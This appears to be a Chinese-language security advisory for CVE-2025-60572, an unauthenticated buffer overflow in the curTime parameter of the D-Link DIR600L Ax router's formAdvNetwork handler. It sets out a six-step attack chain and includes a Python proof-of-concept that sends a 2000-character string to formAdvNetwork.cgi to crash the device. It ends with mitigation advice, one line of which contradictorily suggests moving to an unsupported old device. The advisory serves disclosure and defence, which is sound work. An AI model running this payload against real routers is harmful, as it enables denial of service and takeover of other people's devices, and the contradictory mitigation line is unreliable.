CVE-2025-60572 D-Link DIR600L Ax缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60572

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax (FW116WWb01)

漏洞概述

CVE-2025-60572是D-Link DIR600L Ax路由器固件FW116WWb01中的一个高危缓冲区溢出漏洞。该漏洞存在于formAdvNetwork函数中，攻击者可以通过curTime参数注入超长字符串，导致缓冲区溢出。CVSS评分7.5，属于高危级别，攻击向量为网络层面，无需认证和用户交互即可利用。成功利用此漏洞可导致设备拒绝服务（DoS），使路由器的网络功能完全瘫痪，影响网络可用性。此外，攻击者可能通过精心构造的恶意请求覆盖内存数据，执行任意代码，从而完全控制受影响的设备。由于该漏洞无需认证即可远程利用，且影响路由器的核心网络功能，对网络安全构成严重威胁。建议用户立即采取防御措施，避免设备暴露在互联网环境下。

技术细节

该漏洞为经典的缓冲区溢出（Buffer Overflow）类型，存在于D-Link DIR600L Ax路由器的Web管理界面处理模块中。具体位于formAdvNetwork函数对curTime参数的处理逻辑。当用户通过HTTP请求向路由器提交curTime参数时，该函数直接将用户输入复制到固定大小的缓冲区中，而未进行长度验证。如果攻击者提交超长的字符串数据，将导致缓冲区边界被突破，覆盖相邻内存区域。攻击者可以通过构造包含大量字符的恶意请求包（如curl或Python脚本发送超长字符串）来触发此漏洞。成功利用后可能触发程序崩溃（DoS）或实现代码执行。由于路由器通常作为网络边界设备，此漏洞可被用于网络渗透或构建僵尸网络。攻击者无需获取任何认证凭证即可发动攻击，这大大增加了漏洞的威胁程度。

攻击链分析

STEP 1

步骤1

信息收集：识别目标D-Link DIR600L Ax路由器，获取其IP地址和固件版本FW116WWb01

STEP 2

步骤2

构造恶意请求：构建包含超长字符串的curTime参数作为缓冲区溢出载荷

STEP 3

步骤3

发送攻击包：通过HTTP POST请求将恶意载荷发送到路由器的formAdvNetwork.cgi端点

STEP 4

步骤4

触发溢出：超长字符串超出缓冲区边界，覆盖相邻内存区域

STEP 5

步骤5

实现利用：导致程序崩溃（DoS）或通过覆盖返回地址执行任意代码

STEP 6

步骤6

持久化控制：攻击者可在成功利用后获得路由器完全控制权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60572 PoC - D-Link DIR600L Ax Buffer Overflow
# Target: D-Link DIR600L Ax with FW116WWb01 firmware
# Vulnerability: Buffer overflow in formAdvNetwork function via curTime parameter

target_ip = "192.168.0.1"  # Router IP address
target_port = 80

# Construct malicious payload with oversized curTime parameter
# This triggers buffer overflow in formAdvNetwork function
payload = {
    "curTime": "A" * 2000,  # Overflow payload
    "submit": "Save"
}

url = f"http://{target_ip}:{target_port}/formAdvNetwork.cgi"

try:
    print(f"[*] Sending exploit to {url}")
    print(f"[*] Payload length: {len(payload['curTime'])}")
    response = requests.post(url, data=payload, timeout=10)
    print(f"[+] Response status: {response.status_code}")
    print("[*] Exploit sent. Check if device is still responsive.")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Note: Modify payload and target as needed for testing
# This PoC demonstrates the buffer overflow vulnerability

影响范围

D-Link DIR600L Ax FW116WWb01

防御指南

临时缓解措施

立即将路由器Web管理界面从互联网断开，限制仅允许内网访问；如无必要，关闭路由器的远程管理功能；部署网络防火墙规则，阻止外部IP访问路由器管理端口（80/443）；持续监控设备状态，一旦发现异常立即断网并联系厂商；对于无法立即修复的情况，考虑更换为已停止支持的老旧设备，推荐使用具有安全更新支持的最新型号路由器。